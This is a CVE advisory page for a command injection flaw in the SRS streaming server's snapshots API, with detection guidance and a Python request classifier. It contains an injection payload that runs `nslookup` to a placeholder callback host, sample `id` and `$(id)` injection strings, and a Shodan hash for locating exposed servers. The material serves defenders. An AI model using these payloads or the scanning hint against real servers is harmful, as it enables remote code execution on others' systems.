CVE-2023-34105
Published 2023-06-12
- Priority: P1 81
- Severity: high (CVSS 3.1 base score 7.5)
- CVSS vector: AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
- Exploited in the wild (VulnCheck KEV)
- EPSS: 8.76% (94.5th percentile)
SRS is a real-time video server supporting RTMP, WebRTC, HLS, HTTP-FLV, SRT, MPEG-DASH, and GB28181. Prior to versions 5.0.157, 5.0-b1, and 6.0.48, SRS's `api-server` server is vulnerable to a drive-by command injection. An attacker may send a request to the `/api/v1/snapshots` endpoint containing any commands to be executed as part of the body of the POST request. This issue may lead to Remote Code Execution (RCE). Versions 5.0.157, 5.0-b1, and 6.0.48 contain a fix.
Affected (5 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ossrs | simple_realtime_server | >= 5.0.137 < 5.0.157 | 5.0.157 |
| ossrs | simple_realtime_server | >= 6.0.18 < 6.0.48 | 6.0.48 |
| ossrs | srs | < 5.0-b1 | 5.0-b1 |
| ossrs | srs | — | — |
| ossrs | srs | — | — |
Detection & IOCs

Indicator (command), as reported in the sources:

```json
{"action": "on_publish", "app": "`nslookup {{interactsh-url}}`", "stream":"foo", "vhost": "foo", "client_id":"foo"}
```
- Look for POST requests to /api/v1/snapshots with a JSON body containing backtick-wrapped shell commands in the 'app' parameter; this is the injection vector for CVE-2023-34105.
- The injection occurs specifically in the 'app' parameter of the snapshots API JSON body; monitor for shell metacharacters (backticks, $(), pipes, semicolons) in that field.
- Use the Shodan favicon hash 1386054408 to identify exposed SRS api-server instances on the internet for proactive asset discovery.
- Successful exploitation produces an HTTP 200 response with a JSON body containing both '"code":' and '"data":' fields; correlate with outbound DNS from the server to detect OOB command execution.
- Affected versions are v5.0.137–v5.0.156 and v6.0.18–v6.0.47; flag SRS instances in these version ranges as high-priority targets.
- The vulnerability requires user interaction (UI:R in CVSS) despite being unauthenticated; exploitation is a drive-by scenario, meaning a victim must trigger the request (e.g., via SSRF or a crafted link), not a fully autonomous server-side attack.
- The vulnerable code path is in the api-server component (server.go L761), which may be a separate process/port from the main SRS media server; ensure detection coverage targets the api-server's HTTP listener specifically.
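The request and response checks in the notes above, written out as an added detection example (this is not code from the page or from the SRS project): a classifier that inspects POST requests to `/api/v1/snapshots`, flags shell metacharacters in the `app` field as an alert, and flags metacharacters in any other string field, or an unparseable body, for review. The metacharacter set is the one the notes name (backticks, `$()`, pipes, semicolons) extended by an assumption with `&&` and newlines; the sample requests are constructed here, and the response check mirrors the `"code"` / `"data"` indicator from the notes.

```python
import json
import re

# Endpoint named in the advisory text.
SNAPSHOT_PATH = "/api/v1/snapshots"

# Metacharacters listed in the detection notes (backtick, $(, |, ;) plus
# '&&' and newline, added here as an assumption about the same class of sequence.
SHELL_META = re.compile(r"`|\$\(|\||;|&&|\n")

UNPARSEABLE = "<unparseable>"


def suspicious_fields(body: str) -> list:
    """Return the names of top-level JSON string fields that carry shell
    metacharacters, or [UNPARSEABLE] if the body is not a JSON object."""
    try:
        data = json.loads(body)
    except ValueError:
        return [UNPARSEABLE]
    if not isinstance(data, dict):
        return [UNPARSEABLE]
    return [k for k, v in data.items() if isinstance(v, str) and SHELL_META.search(v)]


def classify_request(method: str, path: str, body: str) -> str:
    """Classify one HTTP request seen on the api-server listener.

    'alert'  - metacharacters in the 'app' field (the documented vector)
    'review' - metacharacters in another field, or a body that is not JSON
    'ignore' - not the snapshots endpoint, or a clean body
    """
    if method != "POST" or path.split("?", 1)[0] != SNAPSHOT_PATH:
        return "ignore"
    fields = suspicious_fields(body)
    if "app" in fields:
        return "alert"
    if fields:
        return "review"
    return "ignore"


def response_looks_successful(status: int, body: str) -> bool:
    """True when the response matches the success indicator from the notes:
    HTTP 200 with a JSON object carrying both 'code' and 'data' keys."""
    if status != 200:
        return False
    try:
        data = json.loads(body)
    except ValueError:
        return False
    return isinstance(data, dict) and "code" in data and "data" in data


# Constructed sample traffic (not captured data): method, path, body.
SAMPLE_REQUESTS = [
    ("POST", SNAPSHOT_PATH, '{"action":"on_publish","app":"live","stream":"foo","vhost":"foo"}'),
    ("POST", SNAPSHOT_PATH, '{"action":"on_publish","app":"`id`","stream":"foo","vhost":"foo"}'),
    ("POST", SNAPSHOT_PATH, '{"action":"on_publish","app":"live","vhost":"$(id)"}'),
    ("POST", SNAPSHOT_PATH, "app=live&stream=foo"),
    ("GET", SNAPSHOT_PATH, ""),
    ("POST", "/api/v1/streams", '{"app":"`id`"}'),
]


def run_samples() -> list:
    """Classify every constructed sample; returns the verdict per request."""
    return [classify_request(m, p, b) for m, p, b in SAMPLE_REQUESTS]


if __name__ == "__main__":
    for (method, path, body), verdict in zip(SAMPLE_REQUESTS, run_samples()):
        print(f"{verdict:6} {method} {path} {body[:60]}")
    print(response_looks_successful(200, '{"code":0,"data":{"x":1}}'))
```

A request classified `alert` is the documented vector; pair it with `response_looks_successful` on the matching reply and with outbound DNS from the host to confirm, as the notes suggest. Only the api-server's listener needs this check, since the vulnerable path lives in that component rather than the media server.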
CVSS provenance
- NVD (CVSS v3.1): 7.5 HIGH, vector CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
- VulnCheck: 7.5 HIGH
No detection rules found.
Nuclei template: CVE-2023-34105 [HIGH] SRS - Command Injection (CVSS 7.5)

SRS's v5.0.137~v5.0.156, v6.0.18~v6.0.47 api-server server is vulnerable to a drive-by command injection.
Template:

```yaml
id: CVE-2023-34105

info:
  name: SRS - Command Injection
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    SRS's v5.0.137~v5.0.156, v6.0.18~v6.0.47 api-server server is vulnerable to a drive-by command injection.
  impact: |
    Unauthenticated attackers with user interaction can inject commands through the app parameter in the snapshots API to execute arbitrary commands on the SRS streaming server.
  remediation: |
    Update SRS (Simple Realtime Server) to a version newer than v5.0.156 or v6.0.47 that properly sanitizes input in the api-server snapshots endpoint.
  reference:
    - https://github.com/ossrs/srs/security/advisories/GHSA-vpr5-779c-cx62
    - https://github.com/ossrs/srs/blob/1d11d02e4b82fc3f37e4b048cff483b1581482c1/trunk/research/api-server/server.go#L761
    - https://github.com/ossrs/srs/commit/1d878c2daaf913ad01c6d0bc2f247116c8050338
```